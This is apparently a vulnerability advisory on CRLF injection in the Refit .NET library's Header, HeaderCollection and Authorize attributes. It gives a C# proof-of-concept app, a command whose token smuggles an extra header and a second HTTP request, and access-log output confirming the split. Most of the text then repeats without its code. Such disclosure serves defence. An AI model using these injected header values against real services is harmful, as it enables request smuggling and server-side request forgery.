Summary
The various header-related Refit attributes (Header, HeaderCollection and Authorize) are vulnerable to CRLF injection.
Details
The way HTTP headers are added to a request is via the HttpHeaders.TryAddWithoutValidation
method:
|
var added = request.Headers.TryAddWithoutValidation(name, value); |
This method does not check for CRLF characters in the header value.
This means that any headers added to a refit request are vulnerable to CRLF-injection. In general, CRLF-injection into a HTTP header (when using HTTP/1.1) means that one can inject additional HTTP headers or smuggle whole HTTP requests.
PoC
The below example code creates a console app that takes one command line variable (a bearer token) and then makes a request to some status page with the provided token inserted in the "Authorization" header:
using Refit;
internal class Program
{
private static void Main(string[] args)
{
// Usage: dotnet run <bearer token>
string token = args[0];
var service = RestService.For<IStatusApi>("http://insert.some.site.here");
string response = service.GetStatus(token).Result;
Console.WriteLine($"Response: {response}");
}
public interface IStatusApi
{
[Get("/status")]
Task<string> GetStatus([Authorize("Bearer")] string token);
}
}
This application is now vulnerable to CRLF-injection, and can thus be abused to for example perform request splitting and thus server side request forgery (SSRF):
anonymous@ubuntu-sofia-672448:~$ dotnet Refit-cli.dll $'test\r\nUser-Agent: injected header!\r\n\r\nGET /smuggled HTTP/1.1\r\nHost: insert.some.site.here'
Response: <html></html>
The application intends to send a single request of the form:
GET /status HTTP/1.1
Host: insert.some.site.here
Authorization: Bearer <bearer token>
But as the application is vulnerable to CRLF injection the above command will instead result in the following two requests being sent:
GET /status HTTP/1.1
Host: insert.some.site.here
Authorization: Bearer test
User-Agent: injected header!
and
GET /smuggled HTTP/1.1
Host: insert.some.site.here
This can be confirmed by checking the access logs on the server where these commands were run (with insert.some.site.here
pointing to localhost):
anonymous@ubuntu-sofia-672448:~$ sudo tail /var/log/apache2/access.log
127.0.0.1 - - [29/Aug/2024:12:17:34 +0000] "GET /status HTTP/1.1" 200 240 "-" "injected header!"
127.0.0.1 - - [29/Aug/2024:12:17:34 +0000] "GET /smuggled HTTP/1.1" 404 436 "-" "-"
Impact
If an application using the Refit library passes a user-controllable value through to a header, then that application becomes vulnerable to CRLF-injection. This is not necessarily a security issue for a command line application like the one above, but if such code were present in a web application then it becomes vulnerable to request splitting (as shown in the PoC) and thus Server Side Request Forgery.
Strictly speaking this is a potential vulnerability in applications using Refit, not in Refit itself, but I would argue that at the very least there needs to be a warning about this behaviour in the Refit documentation.
Summary
The various header-related Refit attributes (Header, HeaderCollection and Authorize) are vulnerable to CRLF injection.
Details
The way HTTP headers are added to a request is via the
HttpHeaders.TryAddWithoutValidation
method:refit/Refit/RequestBuilderImplementation.cs
Line 1328 in 258a771
This method does not check for CRLF characters in the header value.
This means that any headers added to a refit request are vulnerable to CRLF-injection. In general, CRLF-injection into a HTTP header (when using HTTP/1.1) means that one can inject additional HTTP headers or smuggle whole HTTP requests.
PoC
The below example code creates a console app that takes one command line variable (a bearer token) and then makes a request to some status page with the provided token inserted in the "Authorization" header:
This application is now vulnerable to CRLF-injection, and can thus be abused to for example perform request splitting and thus server side request forgery (SSRF):
The application intends to send a single request of the form:
But as the application is vulnerable to CRLF injection the above command will instead result in the following two requests being sent:
and
This can be confirmed by checking the access logs on the server where these commands were run (with
insert.some.site.here
pointing to localhost):Impact
If an application using the Refit library passes a user-controllable value through to a header, then that application becomes vulnerable to CRLF-injection. This is not necessarily a security issue for a command line application like the one above, but if such code were present in a web application then it becomes vulnerable to request splitting (as shown in the PoC) and thus Server Side Request Forgery.
Strictly speaking this is a potential vulnerability in applications using Refit, not in Refit itself, but I would argue that at the very least there needs to be a warning about this behaviour in the Refit documentation.